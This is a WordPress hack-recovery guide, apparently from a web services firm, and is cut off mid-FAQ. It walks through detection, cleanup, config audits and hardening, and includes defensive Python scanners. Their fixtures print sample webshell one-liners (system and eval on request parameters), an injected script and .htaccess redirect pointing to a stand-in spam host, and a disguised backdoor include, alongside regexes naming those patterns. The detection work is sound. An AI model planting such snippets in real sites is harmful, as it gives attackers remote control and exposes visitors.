WordPress Site Has Been Hacked? Here’s Exactly What to Do Next (2025)

Finding out your WordPress site has been hacked is one of the worst feelings a website owner can experience. Your stomach drops. Questions start racing: How long has this been going on? Have my customers been affected? Is my data gone? If you’re in this situation right now and searching for what to do when your WordPress site is hacked, take a breath. This guide will walk you through every step clearly and in the right order.

The good news is that a hacked WordPress site is not necessarily a permanent disaster. With the right approach, most hacked sites can be fully cleaned, restored, and hardened against future attacks. The bad news is that time matters. Every hour your site remains compromised, the damage can deepen: more files infected, more visitors exposed, more SEO equity destroyed. So let’s get moving.


How to Tell If Your WordPress Site Has Been Hacked

Sometimes a hack is obvious. Your homepage has been defaced with a hacker’s message, or your site is redirecting visitors to a spam or adult website. But many WordPress hacks are designed to be invisible to the site owner while actively causing damage to your visitors and your search rankings. Here are the signs your WordPress site has been hacked to watch for:

  • Your site is redirecting to a different website. Visitors land on your domain and get immediately sent to a spam, pharmaceutical, or adult site. You might not see this yourself if the redirect is targeted at specific devices, browsers, or visitors coming from Google search results.
  • Google has flagged your site. You see a “This site may be hacked” warning in Google search results, or Chrome displays a “Deceptive site ahead” red warning page when visitors try to access your site.
  • Your hosting provider has suspended your account. Many hosting providers automatically scan for malware and will suspend accounts that are actively distributing it. An unexpected suspension is often the first sign of a serious infection.
  • You see unfamiliar admin users in WordPress. Check your Users section in the WordPress dashboard. Unknown administrator accounts are a strong indicator that someone has gained unauthorized access to your site.
  • Your site suddenly has new pages or posts you didn’t create. Hackers often inject spammy pages optimized for pharmaceutical keywords, gambling, or counterfeit goods directly into your WordPress database to exploit your site’s existing SEO authority.
  • Google Search Console is showing security warnings. If you have your site connected to Google Search Console, check the Security Issues report. Google actively scans indexed sites for malware and phishing content and reports what it finds.
  • Your site has slowed down dramatically without explanation. Some malware runs resource-intensive processes in the background, such as sending spam email or participating in a botnet, which can make your site noticeably slower.
  • Visitors or customers are contacting you about strange behavior. Reports of unexpected pop-ups, download prompts, or security warnings from your visitors are a serious signal that something is wrong.

If you’re seeing any of these signs, treat it as a confirmed compromise and start working through the steps below immediately.
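The conditional redirects described above are easy to miss because the site looks fine from your own browser. The quickest check is to request the homepage as several different visitors and compare what comes back. The script below is an added example written for this article (it is not part of the original post or of any scanner product): it fetches a URL as a desktop browser, as a phone arriving from a Google search, and as Googlebot, refuses to follow redirects so the Location header stays visible, and reports which profiles behave differently from the plain desktop visit. The user-agent strings, the probe() name and the fake_fetch responses are assumptions constructed for the demo; swap fake_fetch for the default live fetcher to test a real site.

```python
"""Probe one URL under several visitor profiles and report where the
responses diverge. Added example for this article, not code from any plugin
or scanner; the fetcher is injectable so the logic runs offline against
constructed responses."""
import re
import urllib.error
import urllib.request

# Visitor profiles that cloaked redirects commonly key on (assumed UA strings).
PROFILES = {
    "desktop": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0",
    },
    "mobile_from_google": {
        "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) Safari/604.1",
        "Referer": "https://www.google.com/",
    },
    "googlebot": {
        "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    },
}

# Client-side redirect tricks that a 200 response can still carry.
BODY_REDIRECT = re.compile(
    r"window\.(top\.)?location(\.href)?\s*=|document\.location\s*=|http-equiv=[\"']refresh",
    re.IGNORECASE,
)


class _NoFollow(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx responses so the Location header stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, headers):
    """Live fetcher: returns (status, Location header or None, body text)."""
    req = urllib.request.Request(url, headers=headers)
    opener = urllib.request.build_opener(_NoFollow)
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, resp.headers.get("Location"), resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # an unfollowed 3xx arrives here
        return err.code, err.headers.get("Location"), err.read(65536).decode("utf-8", "replace")


def summarize(status, location, body):
    """Keep only the fields that matter when comparing profiles."""
    return {
        "status": status,
        "location": location,
        "body_redirect": bool(BODY_REDIRECT.search(body or "")),
    }


def probe(url, fetch=http_fetch):
    """Fetch `url` under every profile. Returns the per-profile summaries and
    the names of profiles whose behaviour differs from the plain desktop visit;
    any entry in that list is a strong sign of a cloaked redirect."""
    results = {name: summarize(*fetch(url, hdrs)) for name, hdrs in PROFILES.items()}
    baseline = results["desktop"]
    divergent = [n for n, r in results.items() if n != "desktop" and r != baseline]
    return results, divergent


def fake_fetch(url, headers):
    """Constructed responses standing in for a compromised site: only phones
    arriving from a Google search get bounced to a spam domain."""
    if headers.get("Referer", "").startswith("https://www.google.com"):
        return 302, "https://pharmacy-spam.invalid/", ""
    return 200, None, "<html><body><h1>Welcome to our shop</h1></body></html>"


def demo():
    """Run the probe against the constructed site. The live equivalent is
    probe("https://your-site.example/") with the default fetcher."""
    return probe("https://your-site.example/", fetch=fake_fetch)


if __name__ == "__main__":
    results, divergent = demo()
    for name, summary in results.items():
        print(f"{name:20} {summary}")
    print("divergent profiles:", divergent)
```

Run the live version from a machine that is not your usual office connection as well: some redirect code also keys on the visitor's IP address or country, and a redirect that fires only once per visitor (via a cookie) will not show up on the second request from the same client.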


Step 1: Don’t Panic, But Act Fast

The worst thing you can do right now is start making random changes out of panic. Deleting files without understanding what they do, resetting your database without taking a backup, or restoring from an old backup without checking if it’s clean can all make the situation worse. Stay calm, work methodically, and follow the steps in order.

At the same time, don’t delay. Every additional hour of an active infection increases the risk that:

  • More files across your site become infected.
  • Google deepens its blacklist against your domain, extending the time needed for SEO recovery.
  • Visitor data is exposed or your domain is used to send phishing emails, damaging your email reputation.
  • Your hosting provider escalates the suspension or terminates your account entirely.

If you are not comfortable handling a WordPress security incident yourself, skipping to professional help is a completely valid choice and often the faster, safer route. Our WordPress malware removal service is specifically designed for this situation: fast, thorough, and handled by people who do this regularly.


Step 2: Put Your Site Into Maintenance Mode

Before you do anything else, take your site offline or put it into maintenance mode. This stops new visitors from being exposed to malware, phishing content, or malicious redirects while you work on cleaning the infection.

If you still have access to your WordPress dashboard, install and activate a maintenance mode plugin like Coming Soon Page and Maintenance Mode by SeedProd. Keep in mind that a plugin only changes what the front end shows: WordPress itself, and any PHP backdoor the attacker dropped, can still be requested directly by URL. Blocking at the server level is stronger. If your hosting panel lets you password-protect the web root or allow only your own IP address, do that; if your dashboard access has been locked out by the attacker, contact your hosting provider and ask them to temporarily block public access to your site at the server level while you work on the cleanup.


Step 3: Change All of Your Passwords Immediately

Before you clean a single infected file, change every password associated with your WordPress site. If you clean the malware without changing credentials, the attacker can simply log back in and reinfect everything.

Change passwords for:

  • All WordPress admin accounts, especially any you don’t recognize (delete unknown admin accounts entirely).
  • Your hosting control panel account (cPanel, Plesk, or your managed hosting dashboard).
  • Your FTP or SFTP credentials.
  • Your database password in both your hosting panel and your wp-config.php file (these must match).
  • Your domain registrar account, since some sophisticated attackers will attempt to transfer or redirect your domain.
  • Any email accounts associated with your WordPress admin or hosting accounts.

Use long, unique, randomly generated passwords for all of these. A password manager like Bitwarden or 1Password makes this manageable. Changing passwords does not by itself end sessions the attacker already holds, so also regenerate the authentication keys and salts in wp-config.php (see Step 7), which invalidates every existing login cookie, and revoke any application passwords listed on the user profile pages. While you’re at it, enable two-factor authentication on your WordPress admin and hosting panel if it isn’t already active.


Step 4: Scan Your Site for Malware

Now that credentials are secured, you need to understand the full scope of the infection. There are two approaches here: scanning from inside WordPress using a plugin, and scanning from outside using a remote scanner.

Scanning with a WordPress security plugin

Wordfence Security is one of the most widely used WordPress malware scanners and has a solid free tier. After installing and activating it, run a full scan. Wordfence compares your WordPress core files, plugins, and themes against the known clean versions in the WordPress repository and flags any files that have been modified, added, or deleted unexpectedly. Treat the results of any scanner that runs inside the compromised installation with some caution: malware that is already executing on the server can hide files from it, disable it, or tamper with its output.

MalCare is another strong option. Unlike Wordfence, which scans on your server (which can be slow and resource-heavy on a compromised site), MalCare runs its deep scanning on external servers. This makes it less likely to trigger hosting suspensions during the scan process and can find infections that server-side scanners miss.

Scanning with a remote scanner

Sucuri’s SiteCheck tool at sitecheck.sucuri.net will scan your site’s publicly visible output for known malware signatures, blacklist status across major security databases (Google Safe Browsing, McAfee, Norton, and others), and some indicators of outdated or misconfigured software. It’s free, runs in your browser, and takes about a minute. Because it only sees what your site serves to the public, a clean SiteCheck result does not prove the server is clean: a backdoor that does nothing until the attacker calls it is invisible to a remote scanner.

Document everything the scanners find. You’ll need this information to guide the cleanup in the next step.


Step 5: Take a Backup of the Compromised Site

This might seem counterintuitive. Why back up a hacked site? Because before you make any changes, you want a snapshot of the current state. If the cleanup goes wrong, if files get deleted that shouldn’t have been, or if the database is accidentally corrupted during the process, you need a fallback. An infected backup is better than no backup at all, as long as you know it’s infected and treat it accordingly.

Take a full backup (files and database) via your hosting panel or FTP, label it clearly as “infected,” and store it somewhere separate from your hosting environment. Download your web server access and error logs at the same time: hosts rotate them quickly, and they are the best evidence you have for working out how the attacker got in, which you will need when you look for the entry point after the cleanup. Then proceed.


Step 6: Clean the Infection

This is the most technically demanding part of the process. WordPress malware cleanup involves several distinct tasks, and they need to be done thoroughly. Partial cleanup is one of the most common reasons sites get reinfected within days of an apparent recovery.

Remove unknown admin accounts

In your WordPress dashboard under Users, delete any administrator accounts you don’t recognize. WordPress will ask what to do with their content; attribute it to a user you trust rather than deleting it blindly. If you can’t access your dashboard, you can do this directly in your database via phpMyAdmin: the role is stored in wp_usermeta under the wp_capabilities key (with your own table prefix in place of wp_), so look for rows whose value contains “administrator”, then delete the matching rows from wp_users and wp_usermeta. Also look out for accounts whose username or email imitates a system account (support, wp-admin, backup) and for recently registered users with elevated roles.

Reinstall WordPress core files

Download a fresh copy of WordPress from WordPress.org (ideally the latest release, since you will be updating anyway) and replace the core files. Delete the /wp-admin/ and /wp-includes/ folders entirely before uploading the fresh copies; simply overwriting them leaves behind any extra files the attacker added alongside the real ones. Replace all individual files in the root directory as well, except wp-config.php (which contains your database credentials) and .htaccess (handled in Step 7), and leave the /wp-content/ folder in place, since it contains your themes, plugins, and uploads. This wipes out any malware that has been injected into core WordPress files.

Reinstall all plugins and themes from clean sources

Delete all plugins and reinstall them fresh from the WordPress plugin repository or from the original developer. Do the same for your theme. Never reinstall from files that were on the compromised server, as they may still carry the infection. This is also a good time to remove any plugins or themes you weren’t actively using. Check /wp-content/mu-plugins/ as well: “must-use” plugins in that folder load automatically and only appear under a separate tab of the plugin list, which makes it a favorite hiding place for backdoors. Finally, look for unexpected files sitting directly in /wp-content/.

Be especially wary of nulled or pirated WordPress plugins and themes. These are among the most common vectors for WordPress infections because they often come pre-loaded with backdoors that allow attackers persistent access to your site regardless of how many times you clean the visible malware.

Clean your uploads folder

The /wp-content/uploads/ folder cannot be replaced wholesale because it contains your media files. Go through this folder (via FTP or your hosting file manager) and look for any PHP files. There should be no PHP files in your uploads folder under any normal circumstances. Any you find are almost certainly malicious backdoors and should be deleted immediately. Also check for files with an image extension whose contents start with <?php, and for a .htaccess file inside uploads that maps image or other extensions to the PHP handler; both tricks are used to make the uploads folder executable again.
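What the scanners in Step 4 do, and the uploads check just described, can be reproduced offline against the infected backup from Step 5. The script below is an added example for this article, not code from Wordfence, MalCare or WordPress: it walks a WordPress tree, flags PHP under wp-content/uploads (including webshells hiding behind image extensions and an uploads .htaccess that re-enables PHP), flags common eval/obfuscation patterns in any file, and compares core files against an MD5 checksum map. The sample tree, its file contents and the checksum map are constructed for the demo; for a real run, point triage() at the backup and feed it the checksums JSON for your exact WordPress version from api.wordpress.org (the same data wp core verify-checksums uses).

```python
"""Offline triage of a WordPress file tree, for instance the 'infected' backup
taken in Step 5. Added example for this article, not code from Wordfence,
MalCare or WordPress itself. Three checks: PHP code anywhere under
wp-content/uploads (including files hiding behind image extensions and an
uploads .htaccess that re-enables PHP), common obfuscation/eval patterns in any
file, and core files whose MD5 differs from a supplied checksum map."""
import hashlib
import os
import re
import tempfile

# Obfuscation and remote-command patterns typical of PHP webshells/droppers.
SUSPICIOUS = re.compile(
    rb"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    rb"|preg_replace\s*\(\s*['\"][^'\"]*/e['\"]"
    rb"|(assert|eval|system|passthru|shell_exec)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)"
    rb"|\bcreate_function\s*\("
)
PHP_TAG = re.compile(rb"<\?php|<\?=|<script\s+language\s*=\s*['\"]?php", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".phar")
UPLOADS = "wp-content/uploads/"


def md5_of(path):
    """MD5 is what the WordPress checksum API publishes; it is used here as a
    file identity check, not as a security primitive."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def triage(root, core_checksums):
    """Walk `root` and return sorted (relative_path, reason) findings.
    `core_checksums` maps relative core paths to the expected MD5 hex digest;
    in real use that is the "checksums" object returned by
    https://api.wordpress.org/core/checksums/1.0/?version=<ver>&locale=<locale>
    for the exact version installed (the data `wp core verify-checksums` uses)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as f:
                data = f.read()
            if rel.startswith(UPLOADS):
                if name.lower().endswith(PHP_EXT) or PHP_TAG.search(data):
                    findings.append((rel, "php code under uploads"))
                if name == ".htaccess" and re.search(rb"AddHandler|AddType|SetHandler", data, re.I):
                    findings.append((rel, "handler override in uploads .htaccess"))
            if SUSPICIOUS.search(data):
                findings.append((rel, "obfuscated/eval pattern"))
            expected = core_checksums.get(rel)
            if expected and md5_of(full) != expected:
                findings.append((rel, "core file differs from release checksum"))
    return sorted(findings)


def build_sample_site():
    """Constructed WordPress tree: one clean core file, one core file with an
    appended backdoor, a clean image, a webshell disguised as a PNG, a PHP
    dropper named to look like a cache file, and an uploads .htaccess that maps
    .png to the PHP handler. Returns (root, checksum map for the clean release)."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    clean_version = b"<?php\n$wp_version = '6.5';\n"
    clean_load = b"<?php\nfunction wp_load() {}\n"
    files = {
        "wp-includes/version.php": clean_version,
        "wp-includes/load.php": clean_load + b"@eval(base64_decode($_POST['x']));\n",
        "wp-content/uploads/2024/01/logo.png": b"\x89PNG\r\n\x1a\n(image bytes)",
        "wp-content/uploads/2024/01/thumb.png": b"GIF89a<?php eval(base64_decode($_REQUEST['c'])); ?>",
        "wp-content/uploads/2024/01/wp-cache.php": b"<?php system($_GET['cmd']); ?>",
        "wp-content/uploads/.htaccess": b"AddHandler application/x-httpd-php .png\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    checksums = {
        "wp-includes/version.php": hashlib.md5(clean_version).hexdigest(),
        "wp-includes/load.php": hashlib.md5(clean_load).hexdigest(),
    }
    return root, checksums


def demo():
    """Build the constructed tree and triage it."""
    root, checksums = build_sample_site()
    return triage(root, checksums)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:40} {rel}")
```

Pattern matching like this finds the common cases, not everything. A file that merely looks out of place (recently modified, owned by a different user, or not in the release checksum list at all) still deserves a look, and anything flagged should be examined and recorded before it is deleted, since the webshell’s contents often tell you how it was dropped.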

Clean your database

Malware is often injected directly into your WordPress database: into post content, widget settings, option values in wp_options, or user metadata. Look for suspicious patterns like base64-encoded strings (long strings of random-looking characters), injected JavaScript tags (especially in places where JavaScript has no business being, like post content or the site title), and unfamiliar URLs embedded in option values, the siteurl and home options in particular.

The Wordfence scanner will flag database infections. MalCare’s cleanup feature can remove them automatically. If you’re doing this manually, approach database editing with caution: many option values are PHP-serialized arrays whose embedded string lengths must still match after an edit, so re-save them through WordPress rather than hand-editing them in phpMyAdmin, and always have that infected backup available as a reference.
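The unknown-admin check earlier in this step and the database search just described both come down to a handful of queries. The script below is an added example for this article, not code from Wordfence or MalCare. It builds an in-memory SQLite copy of wp_users, wp_usermeta, wp_posts and wp_options with constructed rows (a rogue administrator, a page with an injected script tag, a tampered site title and a widget stuffed with a base64 blob) and runs the same checks you would run against the live MySQL database through wp db query or phpMyAdmin. The wp_ prefix, the expected home URL and the allowlist of known admin logins are assumptions passed in by the caller.

```python
"""Database triage for injected content and rogue administrators. Added
example for this article, not code from Wordfence or MalCare. Runs against an
in-memory SQLite copy of four WordPress tables seeded with constructed rows;
against the live site the same SQL runs via `wp db query` or phpMyAdmin.
Assumes the wp_ table prefix."""
import re
import sqlite3

# Markers that have no business in post content or option values.
INJECTED = re.compile(r"<script\b|<iframe\b|eval\(|base64_decode\(|String\.fromCharCode", re.I)
# A long run of base64 alphabet characters, typical of encoded payloads.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")

SCHEMA = """
CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_posts (ID INTEGER, post_title TEXT, post_content TEXT, post_status TEXT, post_type TEXT);
CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
"""


def find_rogue_admins(conn, known_logins):
    """Administrators are whoever holds the role in wp_usermeta.wp_capabilities,
    regardless of what the dashboard shows. Returns (ID, login, email) for every
    admin not in the allowlist of accounts you recognise."""
    rows = conn.execute(
        "SELECT u.ID, u.user_login, u.user_email FROM wp_users u "
        "JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%' "
        "ORDER BY u.ID"
    ).fetchall()
    return [r for r in rows if r[1] not in known_logins]


def find_injected_posts(conn):
    """Posts/pages whose content carries script tags, iframes or encoded blobs."""
    rows = conn.execute(
        "SELECT ID, post_title, post_content FROM wp_posts "
        "WHERE post_content LIKE '%<script%' OR post_content LIKE '%<iframe%' "
        "OR post_content LIKE '%base64_decode%' OR post_content LIKE '%fromCharCode%'"
    ).fetchall()
    hits = {(pid, title) for pid, title, _ in rows}
    for pid, title, content in conn.execute("SELECT ID, post_title, post_content FROM wp_posts"):
        if LONG_B64.search(content or ""):
            hits.add((pid, title))
    return sorted(hits)


def find_suspicious_options(conn, expected_home):
    """siteurl/home hijacks, plus any option value carrying markup or payloads."""
    findings = []
    for name, value in conn.execute("SELECT option_name, option_value FROM wp_options ORDER BY option_name"):
        value = value or ""
        if name in ("siteurl", "home") and value.rstrip("/") != expected_home.rstrip("/"):
            findings.append((name, "points to " + value))
        elif INJECTED.search(value):
            findings.append((name, "injected markup/code"))
        elif LONG_B64.search(value):
            findings.append((name, "long base64-looking blob"))
    return findings


def seed(conn):
    """Constructed rows: a legitimate admin, a rogue admin, a clean post, a page
    with an injected script, a hijacked blogname and a widget stuffed with base64."""
    conn.executescript(SCHEMA)
    admin_caps = 'a:1:{s:13:"administrator";b:1;}'
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", [
        (1, "owner", "owner@example.com", "2021-03-01 10:00:00"),
        (2, "wp-support", "support@mail.invalid", "2024-05-19 03:12:44"),
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?)", [
        (1, "wp_capabilities", admin_caps),
        (2, "wp_capabilities", admin_caps),
    ])
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?,?,?)", [
        (10, "Hello", "<p>Welcome to the shop.</p>", "publish", "post"),
        (11, "About", '<p>About us</p><script src="https://cdn.spam.invalid/x.js"></script>', "publish", "page"),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?,?)", [
        ("siteurl", "https://example.com"),
        ("home", "https://example.com"),
        ("blogname", 'My Shop<script>top.location="https://cdn.spam.invalid"</script>'),
        ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:160:"' + "QUJD" * 40 + '";}}'),
    ])


def demo(expected_home="https://example.com", known_logins=("owner",)):
    """Seed the constructed database and run all three checks."""
    conn = sqlite3.connect(":memory:")
    seed(conn)
    return {
        "rogue_admins": find_rogue_admins(conn, set(known_logins)),
        "injected_posts": find_injected_posts(conn),
        "suspicious_options": find_suspicious_options(conn, expected_home),
    }


if __name__ == "__main__":
    for check, hits in demo().items():
        print(check, hits)
```

Note that the administrator check reads wp_usermeta rather than trusting the Users screen: the role lives in the wp_capabilities meta value, and an attacker who hides an account from the dashboard still has to leave that row in place to keep the access. The script reports and does not delete; for the serialized values it flags (the a:1:{...} strings), re-save the setting from WordPress or use wp option update rather than editing the string lengths by hand.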


Step 7: Check and Update Your wp-config.php and .htaccess Files

Two files are frequent targets for malicious modification: wp-config.php and .htaccess.

Compare your wp-config.php against a fresh WordPress install. It should only contain your database credentials, table prefix, secret keys and salts (which you should regenerate using the WordPress secret key generator at api.wordpress.org/secret-key/1.1/salt/; doing so logs every user out, the attacker included), and a small number of defined constants. Any additional code blocks are suspicious, especially include or require statements pointing at files elsewhere on the server, anything using eval or base64_decode, and lines prefixed with @ to silence errors.

Your .htaccess file in the root of your WordPress install should contain only the standard WordPress permalink rewrite rules, plus any block your host or a caching plugin legitimately adds (if you are not sure about a block, ask your host). Malicious redirects are very commonly hidden in .htaccess, often conditional on the visitor’s user agent or referrer so that you never see them yourself. Save a copy for reference, delete the file entirely, and regenerate it from WordPress by going to Settings, then Permalinks, and clicking Save Changes. Check for additional .htaccess files in subfolders too, especially /wp-content/uploads/ and /wp-admin/, where attackers also plant rules.
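Before you delete and regenerate these two files, it is worth recording what the attacker put in them, both as evidence and to learn what the redirect was doing. The script below is an added example for this article, not WordPress code: it flags .htaccess directives that are rarely legitimate in a WordPress root (rewrites keyed on the visitor’s user agent or referrer, rewrites and ErrorDocuments pointing off-site, auto_prepend_file, PHP handler mappings) plus any directive outside the # BEGIN WordPress / # END WordPress block, and it flags wp-config.php lines a stock file would not contain, as well as secret keys still set to the sample placeholder. The two input strings are constructed samples; the allowlist of acceptable wp-config.php line shapes is an assumption you may need to widen for hosts that add their own constants.

```python
"""Audit .htaccess and wp-config.php for injected directives before you
regenerate them. Added example for this article, not WordPress code; the two
inputs are constructed strings standing in for files from the infected backup."""
import re

# .htaccess directives that are almost never legitimate in a WordPress root.
HTACCESS_RULES = [
    (re.compile(r"^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}", re.I), "rewrite keyed on visitor user agent/referrer"),
    (re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I), "rewrite to an external URL"),
    (re.compile(r"^\s*Redirect(Match|Permanent|Temp)?\s", re.I), "Redirect directive"),
    (re.compile(r"^\s*ErrorDocument\s+\d+\s+https?://", re.I), "ErrorDocument pointing off-site"),
    (re.compile(r"^\s*php_(value|flag)\s+auto_(prepend|append)_file", re.I), "auto_prepend/append_file loads hidden PHP"),
    (re.compile(r"^\s*(AddHandler|AddType|SetHandler)\s+.*php", re.I), "PHP handler mapping"),
]
WP_BEGIN, WP_END = "# BEGIN WordPress", "# END WordPress"

# Line shapes a stock wp-config.php consists of (assumed allowlist); anything else is flagged.
WPCONFIG_ALLOWED = [
    re.compile(r"^<\?php\s*$"),
    re.compile(r"^\s*$"),
    re.compile(r"^\s*(/\*|\*|//|#)"),
    re.compile(r"^\s*define\s*\(\s*'[A-Z0-9_]+'\s*,"),
    re.compile(r"^\s*\$table_prefix\s*=\s*'[A-Za-z0-9_]+'\s*;"),
    re.compile(r"^\s*if\s*\(\s*!\s*defined\s*\(\s*'ABSPATH'"),
    re.compile(r"^\s*\}\s*$"),
    re.compile(r"^\s*require_once\s*\(?\s*ABSPATH\s*\.\s*'wp-settings\.php'"),
]
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER_SALT = re.compile(r"define\s*\(\s*'(%s)'\s*,\s*'put your unique phrase here'" % "|".join(SALT_KEYS))


def audit_htaccess(text):
    """Return (line_no, line, reason) for every suspicious directive, plus any
    non-comment line that sits outside the WordPress-managed block."""
    findings, inside = [], False
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped == WP_BEGIN:
            inside = True
            continue
        if stripped == WP_END:
            inside = False
            continue
        reasons = [why for rx, why in HTACCESS_RULES if rx.search(line)]
        if not reasons and not inside and stripped and not stripped.startswith("#"):
            reasons.append("directive outside the WordPress block: review")
        findings.extend((no, stripped, why) for why in reasons)
    return findings


def audit_wpconfig(text):
    """Return (line_no, line, reason) for lines a stock wp-config.php would not
    contain, and for secret keys still set to the sample placeholder."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if PLACEHOLDER_SALT.search(line):
            findings.append((no, line.strip(), "placeholder secret key: regenerate"))
        elif not any(rx.search(line) for rx in WPCONFIG_ALLOWED):
            findings.append((no, line.strip(), "unexpected code in wp-config.php"))
    return findings


# Constructed sample: a mobile-and-Google-referrer-only redirect injected above the stock block.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteCond %{HTTP_REFERER} google\. [NC]
RewriteRule ^(.*)$ https://cdn.spam.invalid/go.php [R=302,L]
ErrorDocument 404 https://cdn.spam.invalid/404.php

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

# Constructed sample: a placeholder salt and an @include of a disguised file under uploads.
SAMPLE_WPCONFIG = r"""<?php
// Base configuration for WordPress (constructed sample).
define( 'DB_NAME', 'shop' );
define( 'DB_USER', 'shop_user' );
define( 'DB_PASSWORD', 'redacted' );
define( 'AUTH_KEY', 'put your unique phrase here' );
$table_prefix = 'wp_';
@include "\x2fvar\x2fwww\x2fhtml\x2fwp-content\x2fuploads\x2f.a1b2c3.ico";
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""


def demo():
    """Audit both constructed samples."""
    return {"htaccess": audit_htaccess(SAMPLE_HTACCESS), "wpconfig": audit_wpconfig(SAMPLE_WPCONFIG)}
```

Anything reported as “outside the WordPress block” is a prompt to review, not proof of compromise; caching and security plugins add legitimate rules there. The two injected lines in the samples mirror common patterns: a redirect that fires only for phones arriving from Google, and an @include in wp-config.php of a file with an image extension under uploads, which loads a backdoor on every request without it ever appearing in the plugin list.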


Step 8: Request a Google Review to Remove the Blacklist Warning

If Google flagged your site during the infection, your site will continue showing security warnings in search results and in Chrome until you specifically request a review through Google Search Console. This does not happen automatically, even after your site is clean.

In Google Search Console, go to Security and Manual Actions, then Security Issues. Review the issues Google detected, confirm your site is now clean, and click Request Review. Google typically processes these reviews within one to three days for malware cases, though it can occasionally take longer depending on the severity of the original infection.

If your site was blacklisted by other security databases (Sucuri’s SiteCheck will tell you which ones), each has its own removal request process. The most important ones to address are Google Safe Browsing (handled through Google Search Console), McAfee WebAdvisor, and Norton Safe Web.


Step 9: Harden Your WordPress Site Against Future Attacks

Cleaning a hack without hardening the site is like patching a hole in a fence but leaving the gate wide open. Once you’re clean, implement these protections before bringing your site back online:

  • Update everything. WordPress core, all plugins, and all themes should be on their latest versions. Outdated software is the single most common entry point for WordPress attackers.
  • Enable two-factor authentication on all WordPress admin accounts. Wordfence, WP 2FA, and several other plugins make this straightforward to implement.
  • Limit login attempts. Brute force attacks against the WordPress login page are relentless. A plugin like Limit Login Attempts Reloaded or the login protection built into Wordfence will block IP addresses after a defined number of failed attempts.
  • Disable XML-RPC if you’re not using it. This WordPress feature is a frequent target: its system.multicall method lets an attacker try many passwords in a single request, and its pingback method has been abused for DDoS reflection. Unless you specifically need it for a mobile app, Jetpack, or a remote publishing workflow, it should be disabled.
  • Move your WordPress login page. Changing the default /wp-login.php (and /wp-admin/) URL to something less predictable cuts the volume of automated bot login attempts. It is obscurity rather than a real control, so keep two-factor authentication and login limiting in place regardless.
  • Install a WordPress firewall. Wordfence and Sucuri both offer web application firewall (WAF) functionality that blocks malicious requests before they reach your WordPress installation. Cloudflare’s free plan also includes basic firewall rules at its edge, but only for traffic that actually passes through Cloudflare: your DNS records must be proxied, and your origin server should accept connections only from Cloudflare’s IP ranges, otherwise an attacker who learns the origin IP bypasses the firewall entirely.
  • Set up automated backups to an off-site location. If the worst happens again, you want a clean backup you can restore from quickly. UpdraftPlus with remote storage (Google Drive, Dropbox, or Amazon S3) is a solid free solution.
  • Audit your user accounts regularly. Review your WordPress user list every few months and remove any accounts that are no longer needed.

How Long Does WordPress Malware Removal Take?

For a straightforward infection on a small site with a clean backup available, a confident WordPress user can work through the steps above in three to six hours. For larger sites, complex infections involving database manipulation, or cases where the initial entry point needs to be identified and closed, the process can take a full day or more.

Professional WordPress malware removal is typically faster because experienced technicians have seen the same infection patterns repeatedly and know exactly where to look. At The Beard Guy LLC, our WordPress malware removal service includes a full site scan, complete infection cleanup, security hardening, and a Google blacklist removal request, so your site comes back clean and protected, not just temporarily patched.


Frequently Asked Questions

Can I just restore from a backup instead of cleaning the hack?

Restoring from a backup can be a valid approach, but only if you have a confirmed clean backup from before the infection occurred, and only if you also identify and close the vulnerability that allowed the attacker in. Restoring to a vulnerable state without patching the entry point will result in reinfection, often within hours. If your most recent clean backup is months old, you may also lose significant content and data.

Will my SEO recover after a WordPress hack?

